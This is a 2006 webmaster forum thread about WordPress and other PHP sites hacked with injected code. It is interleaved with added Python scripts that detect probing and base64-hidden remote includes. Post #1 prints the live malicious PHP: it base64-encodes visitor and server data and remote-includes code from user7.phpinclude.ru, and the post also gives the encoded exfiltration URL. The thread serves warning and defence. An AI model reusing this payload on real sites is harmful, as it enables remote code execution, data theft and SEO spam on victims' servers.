Site hacked ~ Check your Google cache NOW!

Discussion in 'Site & Server Administration' started by SEbasic, Feb 8, 2006.

  1. #1
    I've had a WHOLE bunch of sites compromised recently...

    I'm pretty stumped as to how they actually managed to hack the site, but I can tell you now that it's pretty malicious stuff...

    Basically, they're putting this bit of code onto the pages of my sites...
    <?php echo get_option('siteurl'); ?>
    
    error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}
    
    
    Code (markup):
    I think they're using all of that info to get access to machine user information to set up a network of drone machines that they can control...

    I have NO IDEA how they are getting this code on my site ~ an SQL Injection seems to be a potential way, but having gone through my site(s - there are a few they've done this to) log files I can't see any of the telltale signs of an SQL injection.

    Saying that I can't get the POST information in the log files so I'm not sure...

    Anyway...

    Aside from capturing that information, they are also putting links on the pages and cloaking them to google.

    They are pulling the links from this location (This link may time out)....
    http:// user7.phpinclude.ru/?d3d3LndlYWx0aGVzdGVlbS5vcmc=.d3d3LndlYWx0aGVzdGVlbS5vcmc=.Lw==.Z29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbCk=.ODAuMTY5LjE5Mi44Mg==:1)

    http://www.google.co.uk/search?q=phpinclude.ru

    There are nearly 400,000 records containing this site ~ that's where the information is being sent to (specifically user7.phpinclude.ru)

    I urge you to CHECK THE CACHE ON YOUR SITES NOW!

    If you are running open source software you could be at risk ~ they seem to be targeting the widely used open source stuff from what I can tell...

    Really guys CHECK YOUR CACHE NOW!

    They still have access to the sites too ~ every time I remove the code, it's back again a short while later (It took about an hour last time).

    I've lost thousands because of this....

    Don't let it happen to you too.

    CHECK YOUR GOOGLE CACHE!
     
    SEbasic, Feb 8, 2006 IP
  2. T0PS3O

    T0PS3O Feel Good PLC

    #2
    Damn that's bad.

    Are you saying we should check the text version of Google's cache of our own pages for links to those geezers? Or any links we don't recognise for that matter?
     
    T0PS3O, Feb 8, 2006 IP
  3. SEbasic

    SEbasic Peon

    #3
    Check any source code on your sites, and what comes up on your sites when you change your user agent to googlebot (googlebot/2.1 (+http://www.google.com/bot.html))...

    It's pretty malicious stuff and at this stage as I don't have any idea how the site was infiltrated I suggest that you all CHECK YOUR CACHE!
     
    SEbasic, Feb 8, 2006 IP
  4. l234244

    l234244 Peon

    #4
    Is the open source software you use up to date?
     
    l234244, Feb 8, 2006 IP
  5. SEbasic

    SEbasic Peon

    #5
    My particular sites that were hacked were all running various versions of WP...

    If you click the google search link, you'll see that some people are using phpBB, some Gallery (sourceforge) ~ it's all open source, widely used software...

    I'm not saying that it is reserved to open source stuff only, but I would check any site you're running that uses php.
     
    SEbasic, Feb 8, 2006 IP
  6. T0PS3O

    T0PS3O Feel Good PLC

    #6
    I get these fucking probers all day every day looking for vulnerable files, mostly indeed from OS software because it's obviously easier to find holes.

    That's the reason I ALWAYS rename key folders and files; probing doesn't work that way - what they look for returns 404 so they assume you don't run that software and go away. I can highly recommend it.
     
    T0PS3O, Feb 8, 2006 IP
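T0PS3O's point above is that the probes show up in the access log as 404s for paths belonging to software the site does not run. As an added example (mine, not from the thread or from any project it mentions), here is a small Python script that parses combined-format access log lines and lists the clients that asked for several distinct missing paths. The log lines and addresses are constructed (RFC 5737 documentation ranges), and the threshold is an assumption you would tune to your own traffic.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" log format: ip ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Constructed sample: one client walking a list of application paths that do not exist here,
# one ordinary visitor who only misses a favicon. Addresses are documentation ranges, not hosts.
SAMPLE_LOG = """\
203.0.113.7 - - [08/Feb/2006:10:01:02 +0000] "GET /phpBB2/viewtopic.php HTTP/1.0" 404 289 "-" "Mozilla/4.0"
203.0.113.7 - - [08/Feb/2006:10:01:03 +0000] "GET /gallery/index.php HTTP/1.0" 404 289 "-" "Mozilla/4.0"
203.0.113.7 - - [08/Feb/2006:10:01:04 +0000] "GET /forum/viewtopic.php HTTP/1.0" 404 289 "-" "Mozilla/4.0"
203.0.113.7 - - [08/Feb/2006:10:01:05 +0000] "GET /wp-admin/ HTTP/1.0" 404 289 "-" "Mozilla/4.0"
198.51.100.20 - - [08/Feb/2006:10:02:00 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.20 - - [08/Feb/2006:10:02:01 +0000] "GET /about/ HTTP/1.1" 200 3072 "http://example.com/" "Mozilla/5.0"
198.51.100.20 - - [08/Feb/2006:10:02:02 +0000] "GET /favicon.ico HTTP/1.1" 404 289 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return the named fields of one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_probers(lines, min_missing=3):
    """Return {ip: sorted 404 paths} for clients that requested at least `min_missing`
    distinct URLs that do not exist on this site (the threshold is an assumption)."""
    missing = defaultdict(set)
    for line in lines:
        rec = parse_line(line.rstrip("\n"))
        if rec and rec["status"] == "404":
            missing[rec["ip"]].add(rec["path"])
    return {ip: sorted(paths) for ip, paths in missing.items() if len(paths) >= min_missing}


if __name__ == "__main__":
    for ip, paths in find_probers(SAMPLE_LOG.splitlines()).items():
        print(f"{ip} requested {len(paths)} missing paths: {', '.join(paths)}")
```

Run it against a real log with `find_probers(open("/path/to/access_log"))`; a browser that misses one favicon stays below the threshold, while a scanner walking a list of application paths does not, whether or not you have renamed your own folders.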
  7. Smyrl

    Smyrl Tomato Republic Staff

    #7
     
    Smyrl, Feb 8, 2006 IP
  8. T0PS3O

    T0PS3O Feel Good PLC

    #8
    Either by checking the cache, which was fetched by Googlebot, or by installing a FF extension where you can spoof your user agent.
     
    T0PS3O, Feb 8, 2006 IP
    Smyrl likes this.
  9. SEbasic

    SEbasic Peon

    #9
    Either will work fine; the user agent switcher plugin for Firefox can be found here.

    Don't forget to switch it back when you're done though ;)
     
    SEbasic, Feb 8, 2006 IP
  10. T0PS3O

    T0PS3O Feel Good PLC

    #10
    Getting deindexed for cloaking could also be a sign I guess.
     
    T0PS3O, Feb 8, 2006 IP
  11. SEbasic

    SEbasic Peon

    #11
    Yes ~ I've noticed a SEVERE drop in rankings as a result of the outbound links on the page (It's p0rn and H4cker type stuff)...

    If anyone at the big G is reading this, please discount ANY LINKS to these sites ;)

    user7.phpinclude.ru/?d3d3LndlYWx0aGVzdGVlbS5vcmc=.d3d3LndlYWx0aGVzdGVlbS5vcmc=.Lw==.Z29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbCk=.ODAuMTY5LjE5Mi44Mg==:1)
     
    SEbasic, Feb 8, 2006 IP
  12. yfs1

    yfs1 User Title Not Found

    #12
    yfs1, Feb 8, 2006 IP
  13. classifieds

    classifieds Sopchoppy Flash

    #13
    Oliver,

    Are the sites on a shared or dedicated host?
     
    classifieds, Feb 8, 2006 IP
  14. SEbasic

    SEbasic Peon

    #14
    Shared, but it's not restricted to one server.
     
    SEbasic, Feb 8, 2006 IP
  15. Design Agent

    Design Agent Peon

    #15
    Design Agent, Feb 8, 2006 IP
  16. SEbasic

    SEbasic Peon

    #16
    Yeah sorry, that search is only showing the sites where the hack hasn't worked 100% (where errors are being displayed)...

    If it worked right, there will be no reference to phpinclude.ru, other than the base64 encoded reference in the pre-parsed php (dXNlcjcucGhwaW5jbHVkZS5ydQ==)...

    In other words, there are LOADS of sites out there, that just don't realise that they've been hacked.
     
    SEbasic, Feb 8, 2006 IP
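The injected block in post #1 hides its target behind base64_decode() calls, and post #16 points out that on a cleanly infected site the only trace left in the source is that encoded literal (dXNlcjcucGhwaW5jbHVkZS5ydQ==). As an added example, not code from the thread, from WordPress or from any other project, here is a small Python scanner that decodes such literals in PHP sources and flags include/require statements whose target resolves to a remote URL, while leaving ordinary base64 use alone. The two sample files are constructed: one is a shortened copy of the line posted above, the other a clean file that also happens to call base64_decode.

```python
import base64
import os
import re

# What characterises the injected block: errors silenced, then an include/require whose
# target is assembled from base64_decode() string literals.
INCLUDE_RE = re.compile(r'\b(include_once|require_once|include|require)\b\s*\(?\s*([^;{}]+)')
B64_CALL_RE = re.compile(r'base64_decode\(\s*(["\'])([A-Za-z0-9+/=]+)\1\s*\)')
ERR_OFF_RE = re.compile(r'error_reporting\s*\(\s*0\s*\)')
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.I)


def decode_base64_literals(source):
    """Return (literal, decoded_text) for every base64_decode("...") call in `source`."""
    found = []
    for m in B64_CALL_RE.finditer(source):
        raw = m.group(2)
        try:
            text = base64.b64decode(raw, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64 or not text: leave it for a human to look at
        found.append((raw, text))
    return found


def scan_source(path, source):
    """Return (path, level, message) findings for the contents of one PHP file."""
    findings = []
    if ERR_OFF_RE.search(source):
        findings.append((path, "info", "error_reporting(0) present; injected code often silences errors"))
    for m in INCLUDE_RE.finditer(source):
        keyword, arg = m.group(1), m.group(2)
        literals = decode_base64_literals(arg)
        if not literals:
            continue  # a plain include of a file path is normal PHP
        preview = "".join(text for _, text in literals)  # decoded pieces in source order
        level = "high" if REMOTE_RE.match(preview) else "medium"
        findings.append((path, level, f"{keyword} target hidden in base64 decodes to {preview!r}"))
    return findings


def scan_tree(root):
    """Walk a document root and scan every .php file; returns all findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8", errors="replace") as fh:
                    findings.extend(scan_source(full, fh.read()))
    return findings


# Constructed samples: a shortened copy of the injected line from post #1, and a clean file
# that also calls base64_decode, to show that base64 on its own is not flagged.
INFECTED = (
    '<?php error_reporting(0);$str=base64_encode($_SERVER["HTTP_HOST"]);'
    'if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} '
    'else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);} ?>'
)
CLEAN = '<?php $logo = base64_decode("aGVsbG8="); include_once("functions.php"); ?>'

if __name__ == "__main__":
    for path, level, msg in scan_source("header.php", INFECTED) + scan_source("clean.php", CLEAN):
        print(f"[{level}] {path}: {msg}")
```

`scan_tree("/path/to/htdocs")` runs it over a whole site. The decoded preview for the posted line is `http://user7.phpinclude.ru`, which is the hostname the thread names; an include of a URL only works at all when PHP's allow_url_fopen is on (later PHP versions added a separate allow_url_include switch for it), so turning that off is the server-side change that stops this particular payload from pulling anything in, even before you have found how the code got written into the files.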
  17. Jim bob 9 pants

    Jim bob 9 pants Peon

    #17
    What should I be looking for?

    What on earth does that mean?

    I look forward to your replies.

    Jamie
     
    Jim bob 9 pants, Feb 8, 2006 IP
  18. SEbasic

    SEbasic Peon

    #18
    SEbasic, Feb 8, 2006 IP
  19. yfs1

    yfs1 User Title Not Found

    #19
    Are they putting them in sitewide or on individual pages (or in the template)?

    i.e. If you check your index and it's fine, should you go deeper?
     
    yfs1, Feb 8, 2006 IP
  20. Design Agent

    Design Agent Peon

    #20
    Design Agent, Feb 8, 2006 IP